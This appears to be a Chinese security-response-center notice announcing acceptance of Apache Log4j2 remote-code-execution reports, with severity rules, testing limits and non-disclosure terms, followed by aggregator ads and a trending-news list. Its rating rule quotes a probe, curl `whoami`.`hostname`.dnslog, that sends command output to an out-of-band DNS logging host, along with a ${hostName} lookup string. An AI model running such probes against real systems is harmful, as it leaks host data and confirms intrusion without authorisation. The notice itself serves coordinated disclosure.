关于开始接收Log4j2远程代码执行漏洞的通知二
致各位亲爱的白帽子:
经过第一阶段log4j漏洞的收集和跟进,NSRC将于6月9日开始开放全部业务接收Apache Log4j2相关漏洞。
1、发现目标存在log4j漏洞后,其评级标准:
证明能执行命令为高危,参照格式curl `whoami`.`hostname`.dnslog;证明通过${hostName}获取hostname的为低危。
2、不允许测试过程中进行写入文件、反弹shell、内网渗透等恶意操作,否则该行为视为违规,情节严重者将追究法律责任。更多细节请参考《src行业安全测试规范》。
3、在漏洞未经修复前,严禁对外披露漏洞详情,否则将取消所有奖励。
4、漏洞等级会按照漏洞实际影响和危害会进行调整。
5、Apache Log4j2漏洞不参与任何活动,包括但不限于主打产品、积分翻倍、年度季度奖励等。
感谢各位的支持与理解~
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 习近平将对欧洲三国进行国事访问 4915193
- 2 为什么五一机票会大幅降价 4974561
- 3 吃饭理发被直播 顾客成商家引流工具 4865422
- 4 假日经济持续升温 4729047
- 5 特斯拉市值一夜大涨5944亿 4678757
- 6 南京一围墙拆出2万块明代城砖 4573332
- 7 被救助的流浪汉竟是故意杀人逃犯 4453045
- 8 国际不打小孩日 4327511
- 9 常州机场售卖无主行李箱?假的 4281666
- 10 离职员工遭前老板“追杀令” 4187303